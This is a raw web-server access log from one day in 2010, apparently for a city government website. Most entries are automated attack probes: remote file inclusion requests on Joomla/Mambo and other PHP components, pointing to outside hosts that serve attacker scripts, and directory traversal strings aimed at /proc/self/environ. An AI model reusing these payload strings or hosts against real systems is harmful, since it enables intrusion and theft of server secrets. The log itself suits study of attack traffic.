222.236.47.182 - - [02/Sep/2010:04:50:40 -0700] "GET /logs/access_091231.log%20%20///components/com_cpg/cpg.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.253.162.10 - - [02/Sep/2010:04:52:46 -0700] "GET /logs/?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 4084 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
87.253.162.10 - - [02/Sep/2010:04:52:46 -0700] "GET /?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 917 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
87.253.162.10 - - [02/Sep/2010:04:54:25 -0700] "GET /?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 917 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:04:55:40 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:04:55:40 -0700] "GET /logs///components/com_cpg/cpg.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:04:55:41 -0700] "GET /logs/access_100401.log///components/com_cpg/cpg.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.253.162.10 - - [02/Sep/2010:04:56:15 -0700] "GET /?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 917 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
94.23.8.200 - - [02/Sep/2010:04:56:43 -0700] "GET /logs/access_090731.log%20%20/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://nic.bupt.edu.cn/media/j1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
94.23.8.200 - - [02/Sep/2010:04:56:43 -0700] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://nic.bupt.edu.cn/media/j1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
94.23.8.200 - - [02/Sep/2010:04:56:43 -0700] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://nic.bupt.edu.cn/media/j1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
94.23.8.200 - - [02/Sep/2010:04:56:43 -0700] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://nic.bupt.edu.cn/media/j1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
94.23.8.200 - - [02/Sep/2010:04:56:43 -0700] "GET /logs/access_090731.log%20%20/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://nic.bupt.edu.cn/media/j1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
94.23.8.200 - - [02/Sep/2010:04:56:43 -0700] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://nic.bupt.edu.cn/media/j1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:04:58:53 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:04:58:55 -0700] "GET /logs/access.log///components/com_cpg/cpg.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:04:58:56 -0700] "GET /logs///components/com_cpg/cpg.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:04:59:44 -0700] "GET /logs/access.log%20%20///components/com_cpg/cpg.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:04:59:44 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:04:59:47 -0700] "GET /logs///components/com_cpg/cpg.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
217.217.86.204 - - [02/Sep/2010:04:59:54 -0700] "GET /logs/access.log HTTP/1.0" 200 403442 "-" "Wget/1.11.4" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:05:09:26 -0700] "GET /logs///components/com_cpg/cpg.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:05:09:27 -0700] "GET /logs/access_091201.log///components/com_cpg/cpg.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:05:09:31 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:05:09:34 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:05:09:35 -0700] "GET /logs///components/com_cpg/cpg.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:05:09:35 -0700] "GET /logs/access_091231.log%20%20///components/com_cpg/cpg.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:05:11:22 -0700] "GET /logs/access_091231.log///components/com_cpg/cpg.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:05:11:32 -0700] "GET /logs/access_091201.log%20%20///components/com_cpg/cpg.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
94.23.8.200 - - [02/Sep/2010:05:11:35 -0700] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://nic.bupt.edu.cn/media/j1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
94.23.8.200 - - [02/Sep/2010:05:11:35 -0700] "GET /logs/access.log%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://nic.bupt.edu.cn/media/j1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
94.23.8.200 - - [02/Sep/2010:05:11:35 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://nic.bupt.edu.cn/media/j1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
94.23.8.200 - - [02/Sep/2010:05:11:59 -0700] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://nic.bupt.edu.cn/media/j1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
94.23.8.200 - - [02/Sep/2010:05:11:59 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://nic.bupt.edu.cn/media/j1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
94.23.8.200 - - [02/Sep/2010:05:11:59 -0700] "GET /logs/access.log%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://nic.bupt.edu.cn/media/j1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.253.162.10 - - [02/Sep/2010:05:23:35 -0700] "GET /logs/access_091231.log/?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "cityofarkadelphia.com"
87.253.162.10 - - [02/Sep/2010:05:23:35 -0700] "GET /?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 917 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
87.253.162.10 - - [02/Sep/2010:05:23:35 -0700] "GET /logs/?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 4084 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
87.253.162.10 - - [02/Sep/2010:05:28:06 -0700] "GET /logs/access_091231.log/?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "cityofarkadelphia.com"
87.253.162.10 - - [02/Sep/2010:05:28:06 -0700] "GET /?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 917 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
87.253.162.10 - - [02/Sep/2010:05:28:06 -0700] "GET /logs/?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 4084 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
79.143.178.23 - - [02/Sep/2010:05:30:31 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://panaca.com.co/web/images/stories/j1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
79.143.178.23 - - [02/Sep/2010:05:30:31 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://panaca.com.co/web/images/stories/j1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
79.143.178.23 - - [02/Sep/2010:05:30:31 -0700] "GET /logs/access_091201.log%20%20//skin/zero_vote/ask_password.php?dir=http://panaca.com.co/web/images/stories/j1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:05:32:34 -0700] "GET /logs///components/com_cpg/cpg.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:05:32:34 -0700] "GET /logs/access_091201.log///components/com_cpg/cpg.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:05:32:35 -0700] "GET /logs/access_091231.log///components/com_cpg/cpg.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:05:32:35 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:05:33:28 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:05:33:29 -0700] "GET /logs///components/com_cpg/cpg.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:05:33:30 -0700] "GET /logs/access_091201.log%20%20///components/com_cpg/cpg.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:05:34:59 -0700] "GET /logs/access_091231.log%20%20///components/com_cpg/cpg.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
94.103.157.130 - - [02/Sep/2010:05:35:20 -0700] "GET /logs/access_091231.log%20%20//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://kle.iwoly.com/ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "cityofarkadelphia.com"
94.103.157.130 - - [02/Sep/2010:05:35:20 -0700] "GET /components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://kle.iwoly.com/ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "cityofarkadelphia.com"
94.103.157.130 - - [02/Sep/2010:05:35:20 -0700] "GET /logs//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://kle.iwoly.com/ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "cityofarkadelphia.com"
94.103.157.130 - - [02/Sep/2010:05:36:12 -0700] "GET /logs//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://kle.iwoly.com/ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "cityofarkadelphia.com"
94.103.157.130 - - [02/Sep/2010:05:36:12 -0700] "GET /components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://kle.iwoly.com/ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "cityofarkadelphia.com"
94.103.157.130 - - [02/Sep/2010:05:36:12 -0700] "GET /logs/access_091231.log//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://kle.iwoly.com/ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:05:41:06 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:05:41:11 -0700] "GET /logs///components/com_cpg/cpg.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:05:41:19 -0700] "GET /logs/access_091201.log///components/com_cpg/cpg.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.150.160.198 - - [02/Sep/2010:05:42:04 -0700] "GET /logs//index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "cityofarkadelphia.com"
218.150.160.198 - - [02/Sep/2010:05:42:04 -0700] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "cityofarkadelphia.com"
94.103.157.130 - - [02/Sep/2010:05:43:23 -0700] "GET /logs//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://kle.iwoly.com/ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "cityofarkadelphia.com"
94.103.157.130 - - [02/Sep/2010:05:43:23 -0700] "GET /logs/access_091231.log//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://kle.iwoly.com/ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "cityofarkadelphia.com"
94.103.157.130 - - [02/Sep/2010:05:43:23 -0700] "GET /components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://kle.iwoly.com/ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:05:43:26 -0700] "GET /logs/access.log///components/com_cpg/cpg.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
67.195.112.33 - - [02/Sep/2010:05:44:39 -0700] "GET /tmp/?D=A HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "cityofarkadelphia.com"
218.150.160.198 - - [02/Sep/2010:05:50:16 -0700] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:05:54:51 -0700] "GET /logs/access_091231.log//components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:05:54:51 -0700] "GET /components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:05:54:51 -0700] "GET /logs//components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:05:58:07 -0700] "GET /logs/access_091231.log%20%20//components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:05:58:07 -0700] "GET /components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:05:58:13 -0700] "GET /logs//components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:05:59:50 -0700] "GET /logs//components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:05:59:50 -0700] "GET /components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:05:59:50 -0700] "GET /logs/access_100201.log%20%20//components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:05:59:52 -0700] "GET /logs/access_100201.log%20%20//components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:06:03:56 -0700] "GET /components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:06:03:56 -0700] "GET /logs//components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:06:04:02 -0700] "GET /logs/access_100201.log//components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.150.160.198 - - [02/Sep/2010:06:10:19 -0700] "GET /logs/access.log//index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "cityofarkadelphia.com"
218.150.160.198 - - [02/Sep/2010:06:10:19 -0700] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "cityofarkadelphia.com"
218.150.160.198 - - [02/Sep/2010:06:10:20 -0700] "GET /logs//index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "cityofarkadelphia.com"
85.100.213.44 - - [02/Sep/2010:06:42:11 -0700] "GET /index.php?option=com_user&view=reset&layout=confirm HTTP/1.1" 404 - "-" "-" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:06:57:22 -0700] "GET /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:06:57:23 -0700] "GET /logs/access_091101.log//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:06:57:25 -0700] "GET /logs//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:07:01:32 -0700] "GET /logs/access_091001.log//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
94.102.51.147 - - [02/Sep/2010:07:06:52 -0700] "GET /logs/access_100201.log HTTP/1.0" 200 1769472 "http://cityofarkadelphia.com/logs/access_100201.log" "Opera/9.0 (Windows NT 5.1; U; en)" "cityofarkadelphia.com"
217.160.171.163 - - [02/Sep/2010:07:08:09 -0700] "GET /logs//poll/booth.php?include_path=http://calendar.hpl240nj.org//tools/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
217.160.171.163 - - [02/Sep/2010:07:08:09 -0700] "GET /poll/booth.php?include_path=http://calendar.hpl240nj.org//tools/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
217.160.171.163 - - [02/Sep/2010:07:08:09 -0700] "GET /logs/access_091231.log//poll/booth.php?include_path=http://calendar.hpl240nj.org//tools/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:07:11:02 -0700] "GET /logs/access_100201.log%20%20//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:07:11:04 -0700] "GET /logs//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:07:11:11 -0700] "GET /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
207.46.13.99 - - [02/Sep/2010:07:31:09 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "cityofarkadelphia.com"
213.180.209.11 - - [02/Sep/2010:07:41:47 -0700] "GET /logs/access_100329.log HTTP/1.1" 200 9772929 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "cityofarkadelphia.com"
91.212.226.12 - - [02/Sep/2010:07:55:32 -0700] "GET /logs/access_100201.log HTTP/1.0" 200 1441792 "http://cityofarkadelphia.com/logs/access_100201.log" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "cityofarkadelphia.com"
207.46.13.99 - - [02/Sep/2010:08:02:48 -0700] "GET /tmp/ HTTP/1.1" 200 520 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "cityofarkadelphia.com"
174.123.133.130 - - [02/Sep/2010:08:06:36 -0700] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
174.123.133.130 - - [02/Sep/2010:08:06:36 -0700] "GET /logs/access.log%20%20//index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
174.123.133.130 - - [02/Sep/2010:08:06:36 -0700] "GET /logs//index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
174.123.133.130 - - [02/Sep/2010:08:06:36 -0700] "GET /logs/access.log%20%20//index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "cityofarkadelphia.com"
174.123.133.130 - - [02/Sep/2010:08:06:37 -0700] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "cityofarkadelphia.com"
174.123.133.130 - - [02/Sep/2010:08:06:37 -0700] "GET /logs//index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "cityofarkadelphia.com"
174.123.133.130 - - [02/Sep/2010:08:06:37 -0700] "GET /logs/access.log%20%20//index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 - "-" "" "cityofarkadelphia.com"
174.123.133.130 - - [02/Sep/2010:08:06:37 -0700] "GET /logs//index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 - "-" "" "cityofarkadelphia.com"
174.123.133.130 - - [02/Sep/2010:08:06:37 -0700] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 - "-" "" "cityofarkadelphia.com"
174.123.133.130 - - [02/Sep/2010:08:06:37 -0700] "GET /logs/access.log%20%20//index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "" "cityofarkadelphia.com"
174.123.133.130 - - [02/Sep/2010:08:06:37 -0700] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "" "cityofarkadelphia.com"
174.123.133.130 - - [02/Sep/2010:08:06:37 -0700] "GET /logs//index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "" "cityofarkadelphia.com"
74.55.250.50 - - [02/Sep/2010:08:06:39 -0700] "GET /logs//index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
74.55.250.50 - - [02/Sep/2010:08:06:39 -0700] "GET /logs/access.log%20%20//index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
74.55.250.50 - - [02/Sep/2010:08:06:39 -0700] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
74.55.250.50 - - [02/Sep/2010:08:06:39 -0700] "GET /logs//index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "cityofarkadelphia.com"
74.55.250.50 - - [02/Sep/2010:08:06:39 -0700] "GET /logs/access.log%20%20//index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "cityofarkadelphia.com"
74.55.250.50 - - [02/Sep/2010:08:06:39 -0700] "GET /logs//index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 - "-" "" "cityofarkadelphia.com"
74.55.250.50 - - [02/Sep/2010:08:06:39 -0700] "GET /logs/access.log%20%20//index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 - "-" "" "cityofarkadelphia.com"
74.55.250.50 - - [02/Sep/2010:08:06:39 -0700] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "cityofarkadelphia.com"
